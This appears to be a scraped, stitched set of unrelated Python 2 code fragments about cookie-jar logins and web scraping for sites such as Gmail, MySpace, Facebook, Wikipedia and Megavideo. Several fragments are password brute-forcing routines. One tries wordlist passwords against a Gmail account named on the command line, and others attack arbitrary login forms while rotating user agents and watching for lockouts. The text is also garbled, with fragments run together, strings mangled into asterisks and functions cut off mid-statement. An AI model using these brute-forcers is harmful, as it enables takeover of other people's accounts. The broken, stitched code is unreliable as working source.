def setCookie(self, path=False): """ set cookie handler """ if path: self.__url_cookiepath = path try: import cookielib except ImportError: try: import ClientCookie except ImportError: urlopen = urllib2.urlopen Request = urllib2.Request else: urlopen = ClientCookie.urlopen Request = ClientCookie.Request self.__url_cookie = ClientCookie.MozillaCookieJar() if path and os.path.isfile(path): #noinspection PyBroadException try: self.__url_cookcookie.load(path) except Exception, e: pass opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(self.__url_cookie)) ClientCookie.install_opener(opener) self.__url_request = Request self.__url_urlopen = urlopen
def grabdata(url): # proxy_handler = urllib2.ProxyHandler(proxy) # opener = urllib2.build_opener(proxy_handler) opener = urllib2.build_opener() opener.addheaders = [('User-agent', user_agent)] status = False count = 0 data = '' while status == False and count < 5: try: usock = opener.open(url) data = usock.read() usock.close() def checkRefresh(string): pattern = re.compile(r'http-equiv="refresh"') return pattern.search(string) != None if checkRefresh(data): import ClientCookie sock = ClientCookie.build_opener(ClientCookie.HTTPEquivProcessor, ClientCookie.HTTPRefreshProcessor ) ClientCookie.install_opener(sock) data = ClientCookie.urlopen(url).read() status = True except Exception, msg: if count == 4: print "error: grab %s\n%s" % (url, msg) sleep(count) count += 1
def run(self): global success value = getword() try: print "-"*12 print "User:"******"Password:"******"User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen("https://www.gmail.com/") forms = ClientForm.ParseResponse(fp) form = forms[0] form["Email"] = sys.argv[1] form["Passwd"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("Gmail - Inbox", line): print "\tSuccessful Login:", value success = value sys.exit(1) fp.close() except(socket.gaierror), msg: pass
def loginByUser(self, user, url = None): res = True if UrlLoader.loginByUser(self, user, url) == False: return False; signinUrl = self.getUrl() + '/signin' try: cookieJar = ClientCookie.CookieJar() opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cookieJar)) opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(signinUrl) forms = ClientForm.ParseResponse(fp) fp.close() form = forms[0] form['userName'] = user.get('userName') form['password'] = user.get('password') self._cookie = ClientCookie fpTestOpen = ClientCookie.urlopen(form.click()) fpTestOpen.close() except Exception, e: print('Error when login: ' + e.message) res = False
def run(self): global success value = getword() try: print "-"*12 print "User:"******"Password:"******"User-agent", random.sample(headers, 1)[0])] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(sys.argv[1]) forms = ClientForm.ParseResponse(fp) form = forms[0] form["username"] = sys.argv[2] form["password"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("invalid password", line.lower()) != None: print "\tSuccessful Login:"******"The maximum number of 5 login attempts has been exceeded.",line): print "Attempts exceeded" fp.close() except(socket.gaierror), msg: pass
def set_up_cookie_stuff(): COOKIEFILE = './cookies.txt' cj = None ClientCookie = None cookielib = None try: import cookielib except ImportError: try: import ClientCookie except ImportError: urlopen = urllib2.urlopen Request = urllib2.Request else: urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() if cj is not None: if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) if cookielib is not None: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener)
def checkIfLoggedIn(oldPage, url, sensitive): ## method to check it the current cookies allow a successful login ## This has to be a seperate connection and cookie jar. not sure why though cj = None ClientCookie = None cookielib = None try: # Trying cookielib import cookielib except ImportError: ## Falling back to clientcookie try: import ClientCookie except ImportError: ## falling back to no cookie jar urlopen = urllib2.urlopen Request = urllib2.Request else: ## using ClientCookie for cookie jar urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: ## using cookielib for cookie jar urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() if cj is not None: ## if we succesfully imported a cookie jar library if os.path.isfile(COOKIEFILE): ## if cookiefile exists cj.load(COOKIEFILE) if cookielib is not None: ## we used cookielib opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('User-agent', 'Mozilla/5.0')] # Some sites block requests w/o user-agent header urllib2.install_opener(opener) else: ## if we used ClientCookie opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) opener.addheaders = [('User-agent', 'Mozilla/5.0')] # Some sites block requests w/o user-agent header ClientCookie.install_opener(opener) attempt = urlopen(url) ## finally open the page return difflib.SequenceMatcher(None, oldPage, attempt.read()).ratio() ## return the similary ratio of the old page to the new page
def open_connection(email, password): '''Log in to MySpace and store login data into a global opener.''' # 1. Prepare a cookie jar and a global opener jar = ClientCookie.CookieJar() opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(jar)) opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) # 2. Open the Web page with the login form home_resp = ClientCookie.urlopen("http://www.myspace.com") forms = ClientForm.ParseResponse(home_resp, backwards_compat=False) home_resp.close() # 3. Fill the login form and submit login_form = forms[1] login_form[login_email_field] = email login_form[login_password_field] = password login_resp = ClientCookie.urlopen(login_form.click()) result = login_resp.read() login_resp.close() # with open("exit.html", 'w') as f: # f.write(result) # 4. Check if login was successful try: loginPatt = '"UserId":(.*?),' id = int(re.search(loginPatt, result).group(1)) return id > 0 except (TypeError, ValueError, AttributeError): return False
def run(self): global success value = getword() try: print "-"*12 print "User:"******"Password:"******"User-agent", random.sample(headers, 1)[0])] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(sys.argv[1]) forms = ClientForm.ParseResponse(fp) form = forms[0] form["user"] = sys.argv[2] form["pass"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("Login failed.", line.lower()) != None: print "\tSuccessful Login:", value success = value sys.exit(1) fp.close() except(socket.gaierror, urllib2.HTTPError), msg: print msg pass
def post(title, post, YVI_LOGIN, YVI_PASSWORD, YVI_USER_ID=None): request = ClientCookie.Request("http://yvision.kz/auth/") response = ClientCookie.urlopen(request) forms = ParseResponse(response, backwards_compat=False) form = forms[1] form.action = 'http://yvision.kz/ajax/auth/login.php' form['login'] = YVI_LOGIN form['password'] = YVI_PASSWORD request = form.click() response = ClientCookie.urlopen(request) request = ClientCookie.Request('http://%s.yvision.kz/manage/article/add' % YVI_LOGIN) #request = ClientCookie.Request('http://%s.yvision.kz/manage/article/edit/%s' % (YVI_LOGIN,POST_ID)) response = ClientCookie.urlopen(request) forms = ParseResponse(response, backwards_compat=False) form = forms[2] form.action = 'http://%s.yvision.kz/ajax/post/article.php?publicate=1' % YVI_LOGIN form['blog_title'] = title form['blog_post'] = post form['blog_tags'] = "notag" if YVI_USER_ID is not None: form.new_control('hidden','user-id',{'id':'user-id','value':YVI_USER_ID}) form.new_control('hidden','save',{'value':'asd'}) form.new_control('hidden','saveexit',{'value':'asdf'}) request = form.click() response = ClientCookie.urlopen(request)
def execute(self): print "proxyFire module loaded" sub_urls = [] sub_titles = [] sub_index = 0 plist = [] trys = 0 # Create special URL opener (for User-Agent) and cookieJar cookieJar = ClientCookie.CookieJar() opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar)) opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) try: fp = ClientCookie.urlopen("http://www.proxyfire.net/forum/login.php") forms = ClientForm.ParseResponse(fp) fp.close() except Exception, e: print e if trys < 6: time.sleep(5) print "trying again..." trys += 1 else: print "proxyfire.net is timing out" return plist;
def loadURL(url): # Cookie stuff from: # http://www.voidspace.org.uk/python/articles/cookielib.shtml COOKIEFILE = '/var/www/vhosts/davesblogbot/cookies.lwp' #/home/virtual/site1/fst/home/newstoday/BayesBlogBot/cookies.lwp' cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: try: import ClientCookie except ImportError: urlopen = urllib2.urlopen Request = urllib2.Request else: urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() if cj is not None: if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) if cookielib is not None: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = {'User-agent' : 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)'} try: req = Request(url, txdata, txheaders) handle = urlopen(req) except IOError, e: print 'Failed to open "%s".' % url if hasattr(e, 'code'): print 'Failed with error code - %s.' % e.code elif hasattr(e, 'reason'): print "Reason: %s" % e.reason return None
def Login(self): url = "http://bugs.gentoo.org/enter_bug.cgi?product=Gentoo%20Linux" forms = ParseResponse(ClientCookie.urlopen(url)) form = forms[0] print forms[0] try: form["Bugzilla_login"] = self.user form["Bugzilla_password"] = self.password response = ClientCookie.urlopen(form.click("GoAheadAndLogIn")) except: #Already logged in with coookies pass
def __init__( self, url, debug=False ): UserDict.__init__( self ) self['url'] = url self['COOKIEFILE'] = 'freemed-cookies.lwp' if debug: import logging logger = logging.getLogger("cookielib") logger.addHandler(logging.StreamHandler(sys.stdout)) logger.setLevel(logging.DEBUG) cj = None ClientCookie = None cookielib = None try: import cookielib except ImportError: pass else: import urllib2 urlopen = urllib2.urlopen cj = cookielib.LWPCookieJar() Request = urllib2.Request if not cookielib: try: import ClientCookie except ImportError: import urllib2 urlopen = urllib2.urlopen Request = urllib2.Request else: urlopen = ClientCookie.urlopen cj = ClientCookie.LWPCookieJar() Request = ClientCookie.Request if cj != None: if os.path.isfile( self['COOKIEFILE'] ): if debug: print 'DEBUG: Loading cookiefile ' + self['COOKIEFILE'] cj.load( self['COOKIEFILE'] ) if cookielib: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj), MultipartPostHandler.MultipartPostHandler) urllib2.install_opener(opener) else: opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj), MultipartPostHandler.MultipartPostHandler) ClientCookie.install_opener(opener) self['Request'] = Request self['urlopen'] = urlopen self['cj'] = cj
def _my_faves(nbr): #log in to FB _authenticate() #get the ranking data f = ClientCookie.urlopen("http://www.facebook.com/ajax/typeahead/search/first_degree.php?__a="+_user_fb_id+"&filter=user&viewer="+_user_fb_id+"&token=&stale_ok=0") #print f.read() for n, dic in enumerate(json.loads(f.read()[9:])["payload"]["entries"]): #print "".join([str(dic["uid"]),",",str(dic["index"]),",",dic["photo"]]) if n == 0: continue usr_info = json.load(ClientCookie.urlopen("http://graph.facebook.com/"+str(dic["uid"]))) print n+1, usr_info["name"] if (n+1)==int(nbr): return
def login(self): # Sets the client webbrowser cookieJar = ClientCookie.CookieJar() opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar)) opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) # Opens the login page for yahoo.com fp = ClientCookie.urlopen("http://login.yahoo.com") forms = ClientForm.ParseResponse(fp) fp.close() form = forms[0] form["login"] = self.name form["passwd"] = self.pw fp = ClientCookie.urlopen(form.click()) fp.close()
def _about_me(): try: me_dict = json.load(ClientCookie.urlopen(url="https://graph.facebook.com/me?access_token="+token)) for k,v in me_dict.iteritems(): print k, " : ",v except Exception as exc: print exc
def __init__(self): self.userAgent='OobaCacheMgr/'+Version self.urlContext='' self.socketTimeout=7.0 self.cacheFolder='Z:\\~HttpCache\\' if Emulating: self.cacheFolder=ScriptPath+'Cache\\' try: os.makedirs(self.cacheFolder) except: pass self.cookiefile=self.cacheFolder+'~cookies.txt' #the tilde is there to ensure that url2xfilename doesn't create a file that might overwrite this self.defaultCachetime=24*60.0 #minutes self.cookies=ClientCookie.LWPCookieJar() try: self.cookies.revert(self.cookiefile) except: print('Could not open cookie file: '+self.cookiefile) hh=CustomHandler(self.cookies) self.opener=ClientCookie.build_opener(hh)
def retrieve_leagues(self, Choice): QuickFix = "?lhst=stand#lhststand" LeagueId = self.userLeagueId[Choice] LeagueSplit = LeagueId.split('/') LeagueSplit.pop() # Truncated the end portion to get base link LeagueBase = "/".join(LeagueSplit) #----> Option to pick the league you want to open <------# fp = ClientCookie.urlopen(self.base_url + LeagueBase + QuickFix) lines = fp.readlines() fp.close() text = "\n".join(lines) # Use Beautiful Soup to parse the html soup = BeautifulSoup(text) # Finds the teams on the page team_info = soup.find('table',{'class' : 'gametable'}) teams = {} # Gets the information on the teams in the league str_list = [] LeagueTeamIds = [] for info in team_info.findAll('tr', {'class':{'odd','even'}}): temp_list = [] for eachTeam in info.findAll('td'): temp_list.append(eachTeam.string) for moreInfo in eachTeam.findAll('a'): LeagueTeamIds.append(moreInfo['href']) str_list.append(' '.join(temp_list)) self.LeagueTeamIds = LeagueTeamIds return LeagueTeamIds, str_list
def send_message(recipient_profile, subject, body, email, password, opened=False): '''Send a MySpace message to recipient_profile with given subject and body.''' # 1. Open a connection to MySpace # recipient_profile = {'id': 270977337} Send to fake recipient (debug) if not opened: open_connection(email, password) # 2. Open the Web page with the mail form url = mail_message_URL(recipient_profile) form_resp = ClientCookie.urlopen(url) forms = ClientForm.ParseResponse(form_resp, backwards_compat=False) form_resp.close() # 3. Fill the form, submit, and return the result mail_form = forms[1] try: mail_form[mail_subject_field] = subject mail_form[mail_body_field] = body # 20090409 - Additional commands for the To: field mail_form.controls[2].readonly = False # assuming mail_to_field is controls[2] mail_form[mail_to_field] = str(recipient_profile["id"]) except ClientForm.ControlNotFoundError, msg: # For instance, if there is an AWAY message (e.g., id: 47749730) logging.warning("Mail form not found in %s" % url) return None
def call(self, addr, data, namespace, soapaction=None, encoding=None, http_proxy=None, config=Config): if not isinstance(addr, SOAPAddress): addr = SOAPAddress(addr, config) cookie_cutter = ClientCookie.HTTPCookieProcessor(config.cookieJar) hh = ClientCookie.HTTPHandler() opener = ClientCookie.build_opener(cookie_cutter, hh) t = "text/xml" if encoding != None: t += '; charset="%s"' % encoding opener.addheaders = [ ("Content-Type", t), ("Cookie", "Username=foobar"), # ClientCookie should handle ("SOAPAction", "%s" % (soapaction)), ] response = opener.open(addr.proto + "://" + addr.host + addr.path, data) data = response.read() # get the new namespace if namespace is None: new_ns = None else: new_ns = self.getNS(namespace, data) # return response payload return data, new_ns
def login(self): """ Perform the actual login. This method takes the username and password passed in when the class was initialized. It then creates a dictionary with login information. This dictionary is passed into urllib2 to create a Request, which is then passed to ClientCookie.urlopen. This method returns a loginResponse, which is the source code from the default Iodine module. """ try: # Just in case we're trying to run without an Internet connection or something usernameKey = 'login_username' # Defines the username field name passwordKey = 'login_password' # Defines the password field name loginUrl = "https://iodine.tjhsst.edu" # Defines the URL that the request will use loginInformation = {usernameKey: self.username, passwordKey: self.password} # Creates a request dictionary loginInformation = urllib.urlencode(loginInformation) # Encode the login information. loginRequest = urllib2.Request(loginUrl, loginInformation) # Creates a Request that is used to login loginResponse = ClientCookie.urlopen(loginRequest) # Sends the login to Iodine and stores the PHP session ID. loginResponse = loginResponse.read() # Get the HTML/XML from Iodine. webpage = BeautifulSoup(loginResponse) # Set up a Beautiful Soup object eighthChangeUrl = webpage.find(id="menu_eighth")['href'] # Grab the eighth period change URL uid = eighthChangeUrl.split("uid/")[1] # Get the UID based on the eighth period change URL self.uid = uid # And set the uid as a class variable, effectively getting the UID for changing things self.isAuthenticated = True # Yes, yes we are logged in. return True # Yay, no error! except Exception, e: # If we failed for whatever reason... self.uid = None # Set the uid to none. self.isAuthenticated = False # No, no we are not. print e raise Exception("Error in Authenticator: could not log in.") # Raise an exception. raise IodineException("Error in Authenticator: could not log in.", "ERR_AUTHENTICATE_LOGIN") # Raise an IodineException
def getToken(self): """ Get an Edit Token. The MediaWiki API requires this for security purposes. """ token = ClientCookie.urlopen("http://en.wikipedia.org/w/api.php?action=tokens&format=xml").read().split('edittoken="')[1].split('" />')[0] return token
def get_info(self): # Opens the main page of the fantasy football fp = ClientCookie.urlopen(self.base_url) lines = fp.readlines() fp.close() text = "\n".join(lines) with open("localfiles/homepage", 'r') as f: text = f.read() f.close() # Use Beautiful Soup to parse the html. soup = BeautifulSoup(text) # Finds the teams on the page team_info = soup.find('div', {'class':'teams'}) if team_info is None: # Check login sys.stderr.write('Error: Login failed, parser limit exceeded or authentication failure, check username & password\n') sys.exit(1) # Stores the information about the users league userTeams = [] userLeagueId = [] for info in team_info.findAll('a', {'class':'team'}): userTeams.append(info.string) userLeagueId.append(info['href']) self.userTeams = userTeams self.userLeagueId = userLeagueId return (userTeams, userLeagueId)
def getContent(page): url = "http://en.wikipedia.org/w/api.php?action=query&prop=revisions&rvprop=content&rvlimit=1&format=xml&titles=" + \ page.replace(" ", "_") print url pagecontent = ClientCookie.urlopen(url).read() flcre = re.compile(r'(?<=preserve">).*?(?=</rev>)', re.DOTALL) flccontent = re.findall(flcre, pagecontent)[0] return flccontent
def _my_wall(): try: me_dict = json.load(ClientCookie.urlopen(url="https://graph.facebook.com/me/feed?limit=3&access_token="+token)) print me_dict["data"] #for k,v in me_dict.iteritems(): # print k, " : ",v except Exception as exc: print exc
def UploadAttachment(self): import cgi url = "http://bugs.gentoo.org/attachment.cgi?bugid=%s&action=enter" % self.bugNbr forms = ParseResponse(ClientCookie.urlopen(url)) form = forms[0] print form form["description"] = self.ebuild form["contenttypemethod"] = ["list"] form["contenttypeselection"] = ["text/plain"] form["comment"] = "" f = file(self.filename) form.add_file(f, "text/plain", self.ebuild) request = form.click() response2 = ClientCookie.urlopen(request) print "Attachment uploaded." print response2.read() print response2.info()
def http_get( url ): request = urllib2.Request( url ) request.add_header('Referer', url) request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13') #response = urllib2.urlopen(request) response = ClientCookie.urlopen(request) return response
def _post_request(api_url, post_data): """Make request using supplied parameters and return the response, unless an error occurs""" try: #make the request and return response response = ClientCookie.urlopen(url=api_url,data=post_data) return response except HTTPError as exc: #tell user the details of the error raise HTTPException(exc)
def get(self,page): """ basic url to source to beautifulsoup method """ request = urllib2.Request(page,self.dd,self.headers) result = ClientCookie.urlopen(request) html = result.read() data= BeautifulSoup.BeautifulSoup(html) return data
def getLoginURLDataResponse(url): request = urllib2.Request(url) request.add_header('Referer', url) response = ClientCookie.urlopen(request) return response
def downloadpagewithcookies(url): # --------------------------------- # Instala las cookies # --------------------------------- # Inicializa la librería de las cookies ficherocookies = os.path.join( config.get_data_path(), 'cookies.dat' ) logger.info("[scrapertools.py] Cookiefile="+ficherocookies) cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.MozillaCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.MozillaCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: cj.load(ficherocookies) except: logger.info("[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra") os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! #txheaders = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', # 'Referer':'http://www.megavideo.com/?s=signup'} txheaders = { 'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Host':'www.meristation.com', 'Accept-Language':'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3', 'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive':'300', 'Connection':'keep-alive'} # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, None, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data=handle.read() handle.close() return data
def downloadpage(url,post=None,headers=[['User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12']],follow_redirects=True, timeout=socket.getdefaulttimeout()): logger.info("[scrapertools.py] downloadpage") logger.info("[scrapertools.py] url="+url) if post is not None: logger.info("[scrapertools.py] post="+post) else: logger.info("[scrapertools.py] post=None") # --------------------------------- # Instala las cookies # --------------------------------- # Inicializa la librería de las cookies ficherocookies = os.path.join( config.get_setting("cookies.dir"), 'cookies.dat' ) logger.info("[scrapertools.py] ficherocookies="+ficherocookies) cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: logger.info("[scrapertools.py] Importando cookielib") import cookielib except ImportError: logger.info("[scrapertools.py] cookielib no disponible") # If importing cookielib fails # let's try ClientCookie try: logger.info("[scrapertools.py] Importando ClientCookie") import ClientCookie except ImportError: logger.info("[scrapertools.py] ClientCookie no disponible") # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: logger.info("[scrapertools.py] ClientCookie disponible") # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.MozillaCookieJar() else: logger.info("[scrapertools.py] cookielib disponible") # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.MozillaCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules logger.info("[scrapertools.py] Hay cookies") if os.path.isfile(ficherocookies): logger.info("[scrapertools.py] Leyendo fichero cookies") # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: cj.load(ficherocookies) except: logger.info("[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra") os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: logger.info("[scrapertools.py] opener usando urllib2 (cookielib)") # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 if not follow_redirects: opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL),urllib2.HTTPCookieProcessor(cj),NoRedirectHandler()) else: opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL),urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: logger.info("[scrapertools.py] opener usando ClientCookie") # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) # ------------------------------------------------- # Cookies instaladas, lanza la petición # ------------------------------------------------- # Contador inicio = time.clock() # Diccionario para las cabeceras txheaders = {} # Construye el request if post is None: logger.info("[scrapertools.py] petición GET") else: logger.info("[scrapertools.py] petición POST") # Añade las cabeceras logger.info("[scrapertools.py] ---------------------------") for header in headers: logger.info("[scrapertools.py] header %s=%s" % (str(header[0]),str(header[1])) ) txheaders[header[0]]=header[1] logger.info("[scrapertools.py] ---------------------------") req = Request(url, post, txheaders) try: if timeout is None: handle=urlopen(req) else: #Para todas las versiones: deftimeout = socket.getdefaulttimeout() socket.setdefaulttimeout(timeout) handle=urlopen(req) socket.setdefaulttimeout(deftimeout) # Actualiza el almacén de cookies cj.save(ficherocookies) # Lee los datos y cierra if handle.info().get('Content-Encoding') == 'gzip': logger.info("[scrapertools.py] gzipped") fin = inicio import StringIO data=handle.read() compressedstream = StringIO.StringIO(data) import gzip gzipper = gzip.GzipFile(fileobj=compressedstream) data = gzipper.read() gzipper.close() fin = time.clock() else: logger.info("[scrapertools.py] normal") data = handle.read() except urllib2.HTTPError,e: logger.info("error "+repr(e)) import traceback traceback.print_exc() data = e.read() #logger.info("data="+repr(data)) return data
def getLoginURLDataResponse(url): request = urllib2.Request(url) request.add_header('Referer', url) request.add_header('User-Agent', 'Mozilla/4.0 (compatible;)') response = ClientCookie.urlopen(request) return response
def GetMegavideoUser(login, password, megavidcookiepath): #New Login code derived from old code by Voinage etc. Makes no need for mechanize module. #if no user or pass are provided, open login file to get them. if login is False or password is False: if os.path.exists(megavidcookiepath): loginf = openfile(self.login) login = get_user(loginf) password = get_pass(loginf) # --------------------------------------- # Cookie stuff # --------------------------------------- ficherocookies = megavidcookiepath # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # install the cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = "http://www.megavideo.com/?s=signup" #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = "action=login&cnext=&snext=&touser=&user=&nickname=" + login + "&password="******"([^"]+)"' matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata) if len(matches) == 0: patronvideos = 'user=([^\;]+);' matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata) if len(matches) == 0: print 'something bad happened' return matches[0]
def geturl(urlvideo): xbmc.output("[vk.py] url=" + urlvideo) # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = urlvideo.replace("&", "&") #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)' } # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data # Extrae la URL print data regexp = re.compile(r'vkid=([^\&]+)\&') match = regexp.search(data) vkid = "" print 'match %s' % str(match) if match is not None: vkid = match.group(1) else: print "no encontro vkid" patron = "var video_host = '([^']+)'.*?" patron += "var video_uid = '([^']+)'.*?" patron += "var video_vtag = '([^']+)'.*?" patron += "var video_no_flv = ([^;]+);.*?" patron += "var video_max_hd = '([^']+)'" matches = re.compile(patron, re.DOTALL).findall(data) if len(matches) > 0: for match in matches: if match[3].strip() == "0" and match[1] != "0": tipo = "flv" if "http://" in match[0]: videourl = "%s/u%s/video/%s.%s" % (match[0], match[1], match[2], tipo) else: videourl = "http://%s/u%s/video/%s.%s" % ( match[0], match[1], match[2], tipo) elif match[ 1] == "0" and 